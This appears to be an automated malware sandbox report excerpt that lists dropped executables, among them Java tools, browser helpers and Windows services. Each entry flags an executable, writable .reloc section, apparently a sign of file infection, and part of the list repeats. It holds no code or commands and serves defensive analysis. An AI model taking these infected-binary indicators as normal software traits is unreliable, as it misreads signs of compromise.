Source: klist.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Acrobat.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
